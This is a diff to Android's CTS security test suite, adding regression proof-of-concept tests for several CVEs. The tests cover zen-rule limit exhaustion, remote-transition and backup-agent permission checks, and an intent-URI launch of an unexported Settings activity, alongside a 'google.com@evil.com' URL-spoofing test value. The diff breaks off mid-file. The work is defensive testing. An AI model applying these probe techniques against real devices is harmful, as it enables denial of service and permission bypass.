diff --git a/tests/tests/security/res/raw/sig_com_android_wifi_resources.bin b/tests/tests/security/res/raw/sig_com_android_wifi_resources.bin
new file mode 100644
index 0000000..09016e0
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_android_wifi_resources.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_google_cf_apex.bin b/tests/tests/security/res/raw/sig_com_google_cf_apex.bin
new file mode 100644
index 0000000..f894bf6
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_google_cf_apex.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_com_google_emulated_camera_provider_hal.bin b/tests/tests/security/res/raw/sig_com_google_emulated_camera_provider_hal.bin
new file mode 100644
index 0000000..e011b62
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_com_google_emulated_camera_provider_hal.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_a.bin b/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_a.bin
new file mode 100644
index 0000000..af5d313
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_b.bin b/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_b.bin
new file mode 100644
index 0000000..d8fcc87
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_appsearch_helper_cert_b.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_a.bin b/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_a.bin
new file mode 100644
index 0000000..c8c1806
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_b.bin b/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_b.bin
new file mode 100644
index 0000000..802cbc0e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_appsearch_hosttest_helper_cert_b.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_blob_helper_cert.bin b/tests/tests/security/res/raw/sig_cts_blob_helper_cert.bin
new file mode 100644
index 0000000..6e4c311
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_blob_helper_cert.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_blob_helper_cert2.bin b/tests/tests/security/res/raw/sig_cts_blob_helper_cert2.bin
new file mode 100644
index 0000000..35347a6
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_blob_helper_cert2.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_keyset_test_a.bin b/tests/tests/security/res/raw/sig_cts_keyset_test_a.bin
new file mode 100644
index 0000000..4d22159
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_keyset_test_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_keyset_test_b.bin b/tests/tests/security/res/raw/sig_cts_keyset_test_b.bin
new file mode 100644
index 0000000..dbeeefd
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_keyset_test_b.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_keyset_test_c.bin b/tests/tests/security/res/raw/sig_cts_keyset_test_c.bin
new file mode 100644
index 0000000..265ac9a
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_keyset_test_c.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_keyset_test_ec_a.bin b/tests/tests/security/res/raw/sig_cts_keyset_test_ec_a.bin
new file mode 100644
index 0000000..356a5ab
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_keyset_test_ec_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_net_app.bin b/tests/tests/security/res/raw/sig_cts_net_app.bin
new file mode 100644
index 0000000..ff683ed
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_net_app.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_testkey1.bin b/tests/tests/security/res/raw/sig_cts_testkey1.bin
new file mode 100644
index 0000000..ca90fe2
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_testkey1.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_testkey2.bin b/tests/tests/security/res/raw/sig_cts_testkey2.bin
new file mode 100644
index 0000000..4371c21
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_testkey2.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_cts_uicc_2021.bin b/tests/tests/security/res/raw/sig_cts_uicc_2021.bin
new file mode 100644
index 0000000..7125291
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_cts_uicc_2021.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256.bin b/tests/tests/security/res/raw/sig_ec_p256.bin
new file mode 100644
index 0000000..e611e3d
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256_2.bin b/tests/tests/security/res/raw/sig_ec_p256_2.bin
new file mode 100644
index 0000000..7723bea
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256_2.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256_3.bin b/tests/tests/security/res/raw/sig_ec_p256_3.bin
new file mode 100644
index 0000000..cc82af9
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256_3.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256_4.bin b/tests/tests/security/res/raw/sig_ec_p256_4.bin
new file mode 100644
index 0000000..29980db
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256_4.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_ec_p256_5.bin b/tests/tests/security/res/raw/sig_ec_p256_5.bin
new file mode 100644
index 0000000..e62d5bb
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_ec_p256_5.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_keyset_A.bin b/tests/tests/security/res/raw/sig_keyset_A.bin
new file mode 100644
index 0000000..e484ec3
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_keyset_A.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_keyset_B.bin b/tests/tests/security/res/raw/sig_keyset_B.bin
new file mode 100644
index 0000000..b95719c
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_keyset_B.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_rro_remounted_test_a.bin b/tests/tests/security/res/raw/sig_rro_remounted_test_a.bin
new file mode 100644
index 0000000..24d2d55
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_rro_remounted_test_a.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_rsa_2048.bin b/tests/tests/security/res/raw/sig_rsa_2048.bin
new file mode 100644
index 0000000..d61baef
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_rsa_2048.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_sdk_sandbox.bin b/tests/tests/security/res/raw/sig_sdk_sandbox.bin
new file mode 100644
index 0000000..3b01c2e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_sdk_sandbox.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_security_cts_test_cert.bin b/tests/tests/security/res/raw/sig_security_cts_test_cert.bin
new file mode 100644
index 0000000..e62cbff
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_security_cts_test_cert.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_shell_as_test_app_key.bin b/tests/tests/security/res/raw/sig_shell_as_test_app_key.bin
new file mode 100644
index 0000000..be5aab5
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_shell_as_test_app_key.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_test_cert_1.bin b/tests/tests/security/res/raw/sig_test_cert_1.bin
new file mode 100644
index 0000000..e611e3d
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_test_cert_1.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_test_cert_2.bin b/tests/tests/security/res/raw/sig_test_cert_2.bin
new file mode 100644
index 0000000..7723bea
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_test_cert_2.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_test_cert_3.bin b/tests/tests/security/res/raw/sig_test_cert_3.bin
new file mode 100644
index 0000000..cc82af9
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_test_cert_3.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_test_cert_4.bin b/tests/tests/security/res/raw/sig_test_cert_4.bin
new file mode 100644
index 0000000..29980db
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_test_cert_4.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_testcert.bin b/tests/tests/security/res/raw/sig_testcert.bin
new file mode 100644
index 0000000..cae337e
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_testcert.bin
Binary files differ
diff --git a/tests/tests/security/res/raw/sig_unit_test.bin b/tests/tests/security/res/raw/sig_unit_test.bin
new file mode 100644
index 0000000..4dbbc49
--- /dev/null
+++ b/tests/tests/security/res/raw/sig_unit_test.bin
Binary files differ
diff --git a/tests/tests/security/res/values/integers_CVE_2022_20429.xml b/tests/tests/security/res/values/integers_CVE_2022_20429.xml
new file mode 100644
index 0000000..a9d10ff
--- /dev/null
+++ b/tests/tests/security/res/values/integers_CVE_2022_20429.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<resources>
+    <integer name="cve_2022_20429_disable">2</integer>
+    <integer name="cve_2022_20429_enable">1</integer>
+    <integer name="cve_2022_20429_failure">-1</integer>
+    <integer name="cve_2022_20429_success">0</integer>
+    <integer name="cve_2022_20429_timeoutMs">20000</integer>
+</resources>
diff --git a/tests/tests/security/res/values/strings.xml b/tests/tests/security/res/values/strings.xml
index ee1f73e..3423f32 100644
--- a/tests/tests/security/res/values/strings.xml
+++ b/tests/tests/security/res/values/strings.xml
@@ -32,4 +32,31 @@
     <string name="cve_2022_20338_invalidURL">https://google.com@evil.com</string>
     <string name="cve_2022_20338_path">@evil.com</string>
     <string name="cve_2022_20338_scheme">https</string>
+
+    <!-- CVE-2023-20960 -->
+    <string name="cve_2023_20960_dumpsysActivityCmd">dumpsys activity %1$s</string>
+    <string name="cve_2023_20960_failMsg">Device is vulnerable to b/250589026, Unexported
+    activities can be launched using ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY</string>
+    <string name="cve_2023_20960_forwardSlash">/</string>
+    <string name="cve_2023_20960_mResumedTruePattern">.*mResumed=true.*</string>
+    <string name="cve_2023_20960_settingsPackageName">com.android.settings</string>
+    <string name="cve_2023_20960_unexportedActivity">.security.InstallCaCertificateWarning</string>
+    <string name="cve_2023_20960_uriStringComponent">component=</string>
+    <string name="cve_2023_20960_uriStringIntent">intent:#Intent;</string>
+    <string name="cve_2023_20960_uriStringSuffix">;end</string>
+
+    <!-- CVE-2021-0600 -->
+    <string name="cve_2021_0600_action">CVE_2021_0600_action</string>
+    <string name="cve_2021_0600_errorCreateCharSeq">Failed to create a charsequence to contain HTML
+    text</string>
+    <string name="cve_2021_0600_failMsg">Vulnerable to b/179042963 !!</string>
+    <string name="cve_2021_0600_intentNotFound">Failed to resolve %1$s</string>
+    <string name="cve_2021_0600_keyException">exception</string>
+    <string name="cve_2021_0600_keyHtml">html</string>
+    <string name="cve_2021_0600_noException">noException</string>
+    <string name="cve_2021_0600_pattern">.*CVE_2021_0600_EXPN.*</string>
+    <string name="cve_2021_0600_patternNotFound">UI element with text pattern %1$s not found
+    </string>
+    <string name="cve_2021_0600_targetText">CVE_2021_0600_EXPN</string>
+    <string name="cve_2021_0600_targetTextHtml"><![CDATA[<h1>CVE_2021_0600_EXPN</h1>]]></string>
 </resources>
diff --git a/tests/tests/security/res/values/strings_CVE_2022_20429.xml b/tests/tests/security/res/values/strings_CVE_2022_20429.xml
new file mode 100644
index 0000000..f515bcf
--- /dev/null
+++ b/tests/tests/security/res/values/strings_CVE_2022_20429.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<resources>
+    <string name="cve_2022_20429_allowButtonResKey">allow</string>
+    <string name="cve_2022_20429_broadcastAction">testBluetoothModeChangeBroadcastAction</string>
+    <string name="cve_2022_20429_btAction">btAction</string>
+    <string name="cve_2022_20429_carSettingsPackageName">com.android.car.settings</string>
+    <string name="cve_2022_20429_failMsg">Device is vulnerable to b/220741473!!</string>
+    <string name="cve_2022_20429_featureMissing">Skipping test: %1$s missing.</string>
+    <string name="cve_2022_20429_messageKey">message</string>
+    <string name="cve_2022_20429_resType">string</string>
+    <string name="cve_2022_20429_resultKey">result</string>
+</resources>
diff --git a/tests/tests/security/res/values/strings_CVE_2023_21143.xml b/tests/tests/security/res/values/strings_CVE_2023_21143.xml
new file mode 100644
index 0000000..cef10c7
--- /dev/null
+++ b/tests/tests/security/res/values/strings_CVE_2023_21143.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<resources>
+    <string name="channelId">notification_channel_id</string>
+    <string name="channelName">notification_channel_name</string>
+    <string name="failMsg">Device is vulnerable to b/268193777 !!</string>
+    <string name="noPidFound">No pid found for com.android.systemui</string>
+    <string name="notificationSendingFailed">notification has not been sent successfully</string>
+    <string name="notificationText">notification_text</string>
+    <string name="shellCommandForHome">input keyevent KEYCODE_HOME</string>
+    <string name="systemuiPidCommand">pidof com.android.systemui</string>
+</resources>
diff --git a/tests/tests/security/res/xml/device_admin_cve_2021_0600.xml b/tests/tests/security/res/xml/device_admin_cve_2021_0600.xml
new file mode 100644
index 0000000..2b7410c
--- /dev/null
+++ b/tests/tests/security/res/xml/device_admin_cve_2021_0600.xml
@@ -0,0 +1,20 @@
+<?xml version ="1.0" encoding ="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<device-admin>
+    <uses-policies />
+</device-admin>
diff --git a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
index b380472..880c5c6 100644
--- a/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
+++ b/tests/tests/security/src/android/security/cts/ActivityManagerTest.java
@@ -258,6 +258,82 @@
         assertNull(activity.mReceivedTransition);
     }
 
+    @AsbSecurityTest(cveBugId = 286882367)
+    @Test
+    public void testActivityManager_rejectRemoteTransition() throws Exception {
+        Context targetContext = getInstrumentation().getTargetContext();
+        final Intent baseIntent = new Intent(targetContext, WaitEnterAnimActivity.class);
+        baseIntent.setFlags(FLAG_ACTIVITY_NO_USER_ACTION | FLAG_ACTIVITY_NEW_TASK);
+
+        final boolean[] remoteCalled = new boolean[]{false};
+        RemoteTransition someRemote = new RemoteTransition(new IRemoteTransition.Stub() {
+            @Override
+            public void startAnimation(IBinder token, TransitionInfo info,
+                    SurfaceControl.Transaction t,
+                    IRemoteTransitionFinishedCallback finishCallback) throws RemoteException {
+                remoteCalled[0] = true;
+                t.apply();
+                finishCallback.onTransitionFinished(null /* wct */, null /* sct */);
+            }
+
+            @Override
+            public void mergeAnimation(IBinder token, TransitionInfo info,
+                    SurfaceControl.Transaction t, IBinder mergeTarget,
+                    IRemoteTransitionFinishedCallback finishCallback) throws RemoteException {
+                remoteCalled[0] = true;
+            }
+        });
+        ActivityOptions opts = ActivityOptions.makeRemoteTransition(someRemote);
+
+        boolean securityException = false;
+        final WaitEnterAnimActivity baseActivity;
+        try {
+            baseActivity = (WaitEnterAnimActivity)
+                    getInstrumentation().startActivitySync(baseIntent, opts.toBundle());
+            assertTrue(waitUntil(() -> baseActivity.mAnimComplete));
+        } catch (SecurityException se) {
+            securityException = true;
+        }
+
+        assertFalse(remoteCalled[0]);
+        assertTrue(securityException);
+    }
+
+    @AsbSecurityTest(cveBugId = 289549315)
+    @Test
+    public void testActivityManager_backupAgentCreated_rejectIfCallerUidNotEqualsPackageUid()
+            throws Exception {
+        SecurityException securityException = null;
+        Exception unexpectedException = null;
+        try {
+            final Object iam = ActivityManager.class.getDeclaredMethod("getService").invoke(null);
+            Class.forName("android.app.IActivityManager").getDeclaredMethod("backupAgentCreated",
+                            String.class, IBinder.class, int.class)
+                    .invoke(iam, /* agentPackageName*/ "android", /* agent */ null, /* userId */ 0);
+        } catch (SecurityException e) {
+            securityException = e;
+        } catch (InvocationTargetException e) {
+            if (e.getCause() instanceof SecurityException) {
+                securityException = (SecurityException) e.getCause();
+            } else {
+                unexpectedException = e;
+            }
+        } catch (Exception e) {
+            unexpectedException = e;
+        }
+        if (unexpectedException != null) {
+            Log.w("ActivityManagerTest", "Unexpected exception", unexpectedException);
+            fail("ActivityManagerNative.backupAgentCreated() API should have thrown "
+                    + "SecurityException when invoked from process with uid not matching target "
+                    + "package uid.");
+        }
+
+        assertNotNull("Expected SecurityException when caller's uid doesn't match package uid",
+                securityException);
+        assertEquals("android does not belong to uid " + Process.myUid(),
+                securityException.getMessage());
+    }
+
     /**
      * Run ActivityManager.getHistoricalProcessExitReasons once, return the time spent on it.
      */
@@ -325,6 +401,15 @@
         }
     }
 
+    public static class WaitEnterAnimActivity extends Activity {
+        public boolean mAnimComplete = false;
+
+        @Override
+        public void onEnterAnimationComplete() {
+            mAnimComplete = true;
+        }
+    }
+
     public static class ActivityOptionsActivity extends Activity {
         public RemoteTransition mReceivedTransition = null;
         public boolean mPreCreate = false;
diff --git a/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/AutomaticZenRuleTests.java b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/AutomaticZenRuleTests.java
new file mode 100644
index 0000000..5579026
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/AutomaticZenRuleTests.java
@@ -0,0 +1,207 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.AutomaticZenRuleTests;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.AutomaticZenRule;
+import android.app.Instrumentation;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.ComponentName;
+import android.content.Context;
+import android.net.Uri;
+import android.platform.test.annotations.AsbSecurityTest;
+import androidx.test.InstrumentationRegistry;
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.sts.common.util.StsExtraBusinessLogicTestCase;
+
+import org.junit.After;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.ArrayList;
+
+@RunWith(AndroidJUnit4.class)
+public class AutomaticZenRuleTests extends StsExtraBusinessLogicTestCase {
+    private static final String URI_STRING = "condition://android";
+    private static final String ZEN_RULE_NAME = "ZenRuleName";
+    private boolean mNotificationPolicyAccessGranted = false;
+    private NotificationManager mNotificationManager = null;
+    private String mPackageName = null;
+    private UiAutomation mUiautomation = null;
+
+    @Before
+    public void setUp() {
+        try {
+            final int timeoutDuration = 5000;
+            final int waitDuration = 100;
+            Instrumentation instrumentation = InstrumentationRegistry.getInstrumentation();
+            Context context = instrumentation.getContext();
+            mNotificationManager = context.getSystemService(NotificationManager.class);
+            mPackageName = context.getPackageName();
+            mUiautomation = instrumentation.getUiAutomation();
+            mUiautomation.executeShellCommand("cmd notification allow_dnd " + mPackageName);
+            long startTime = System.currentTimeMillis();
+            while (System.currentTimeMillis() - startTime < timeoutDuration) {
+                // Busy wait until notification policy access is granted
+                if (mNotificationManager.isNotificationPolicyAccessGranted()) {
+                    mNotificationPolicyAccessGranted = true;
+                    break;
+                }
+                Thread.sleep(waitDuration);
+            }
+            assumeTrue("Notification policy access not granted", mNotificationPolicyAccessGranted);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    @After
+    public void tearDown() {
+        try {
+            mUiautomation.executeShellCommand("cmd notification disallow_dnd " + mPackageName);
+        } catch (Exception ignoredException) {
+            // Ignoring exceptions
+        }
+    }
+
+    private boolean testUsingAppComponents(ComponentName owner, ComponentName components[]) {
+        int automaticZenRules = 0;
+        boolean isVulnerable = true;
+        final int ruleLimitPerPackage = (components != null && components.length > 1) ? 60 : 200;
+        ArrayList<String> ruleIds = new ArrayList<>();
+        try {
+            // Storing the number of automaticZenRules present before test run
+            automaticZenRules = mNotificationManager.getAutomaticZenRules().size();
+
+            for (int i = 0; i < ruleLimitPerPackage; ++i) {
+                if (components != null) {
+                    for (int j = 0; j < components.length; ++j) {
+                        int ruleNo = i * components.length + j;
+                        Uri conditionId = Uri.parse(URI_STRING + ruleNo);
+                        AutomaticZenRule rule = new AutomaticZenRule(ZEN_RULE_NAME + ruleNo, owner,
+                                components[j], conditionId, null,
+                                NotificationManager.INTERRUPTION_FILTER_ALL, true);
+                        String id = mNotificationManager.addAutomaticZenRule(rule);
+                        ruleIds.add(id);
+                    }
+                } else {
+                    Uri conditionId = Uri.parse(URI_STRING + i);
+                    AutomaticZenRule rule = new AutomaticZenRule(ZEN_RULE_NAME + i, owner, null,
+                            conditionId, null, NotificationManager.INTERRUPTION_FILTER_ALL, true);
+                    String id = mNotificationManager.addAutomaticZenRule(rule);
+                    ruleIds.add(id);
+                }
+            }
+        } catch (Exception e) {
+            isVulnerable = false;
+            if (!(e instanceof IllegalArgumentException)) {
+                assumeNoException(e);
+            }
+        } finally {
+            try {
+                if (mNotificationPolicyAccessGranted) {
+                    // Retrieving the total number of automaticZenRules added by test so that the
+                    // test fails only if all automaticZenRules were added successfully
+                    automaticZenRules =
+                            mNotificationManager.getAutomaticZenRules().size() - automaticZenRules;
+                    for (String id : ruleIds) {
+                        mNotificationManager.removeAutomaticZenRule(id);
+                    }
+                }
+                int ruleLimitPerPackageTotal =
+                        components != null ? ruleLimitPerPackage * components.length
+                                : ruleLimitPerPackage;
+                boolean allZenRulesAdded = ruleLimitPerPackageTotal == automaticZenRules;
+                isVulnerable = (isVulnerable && allZenRulesAdded);
+            } catch (Exception ignoredException) {
+                // Ignoring exceptions
+            }
+        }
+        return isVulnerable;
+    }
+
+    // b/220735360
+    // Vulnerable library : framework.jar
+    // Vulnerable module : Not applicable
+    // Is Play managed : No
+    @AsbSecurityTest(cveBugId = 220735360)
+    @Test
+    public void testPocCVE_2022_20143() {
+        try {
+            ComponentName appComponent =
+                    new ComponentName(mPackageName, PocActivity.class.getCanonicalName());
+            ComponentName[] components = {appComponent};
+            boolean testUsingAppSingleComponentStatus = testUsingAppComponents(null, components);
+            assertFalse("Device is vulnerable to b/220735360!! System can be corrupted by adding"
+                    + " many automaticZenRules via NotificationManager#addAutomaticZenRule."
+                    + " Note: Device also seems to be vulnerable to b/235823407 and"
+                    + " b/242537431", testUsingAppSingleComponentStatus);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    // b/235823407
+    // Vulnerable library : framework.jar
+    // Vulnerable module : Not applicable
+    // Is Play managed : No
+    @AsbSecurityTest(cveBugId = 235823407)
+    @Test
+    public void testPocCVE_2022_20425() {
+        try {
+            ComponentName firstConfigurationActivity =
+                    new ComponentName(mPackageName, PocActivity.class.getCanonicalName());
+            ComponentName secondConfigurationActivity =
+                    new ComponentName(mPackageName, SecondPocActivity.class.getCanonicalName());
+            ComponentName[] components = {firstConfigurationActivity, secondConfigurationActivity};
+            boolean testUsingAppMultipleComponentStatus = testUsingAppComponents(null, components);
+            assertFalse(
+                    "Device is vulnerable to b/235823407!! Bypass fix of CVE-2022-20143:"
+                            + " Bypass zen rule limit with different configuration Activity"
+                            + " Note: Device also seems to be vulnerable to b/242537431",
+                    testUsingAppMultipleComponentStatus);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    // b/242537431
+    // Vulnerable library : framework.jar
+    // Vulnerable module : Not applicable
+    // Is Play managed : No
+    @AsbSecurityTest(cveBugId = 242537431)
+    @Test
+    public void testPocCVE_2022_20455() {
+        try {
+            ComponentName systemComponent =
+                    new ComponentName("android", "ScheduleConditionProvider");
+            boolean testUsingSystemComponentStatus = testUsingAppComponents(systemComponent, null);
+            assertFalse(
+                    "Device is vulnerable to b/242537431!! System can be corrupted by adding"
+                            + " many automaticZenRules via NotificationManager#addAutomaticZenRule",
+                    testUsingSystemComponentStatus);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/PocActivity.java
similarity index 92%
rename from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
rename to tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/PocActivity.java
index 4416990..99ba57f 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/PocActivity.java
@@ -14,7 +14,7 @@
  * limitations under the License.
  */
 
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.AutomaticZenRuleTests;
 
 import android.app.Activity;
 
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/SecondPocActivity.java
similarity index 86%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/SecondPocActivity.java
index 4416990..0209c9d 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/tests/tests/security/src/android/security/cts/AutomaticZenRuleTests/SecondPocActivity.java
@@ -14,9 +14,9 @@
  * limitations under the License.
  */
 
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.AutomaticZenRuleTests;
 
 import android.app.Activity;
 
-public class PocActivity extends Activity {
+public class SecondPocActivity extends Activity {
 }
diff --git a/tests/tests/security/src/android/security/cts/CVE_2021_0600/CVE_2021_0600.java b/tests/tests/security/src/android/security/cts/CVE_2021_0600/CVE_2021_0600.java
new file mode 100644
index 0000000..7981c42
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/CVE_2021_0600/CVE_2021_0600.java
@@ -0,0 +1,137 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0600;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.graphics.Rect;
+import android.platform.test.annotations.AsbSecurityTest;
+import android.security.cts.R;
+import android.support.test.uiautomator.By;
+import android.support.test.uiautomator.BySelector;
+import android.support.test.uiautomator.UiDevice;
+import android.support.test.uiautomator.UiObject2;
+import android.support.test.uiautomator.Until;
+
+import androidx.test.runner.AndroidJUnit4;
+
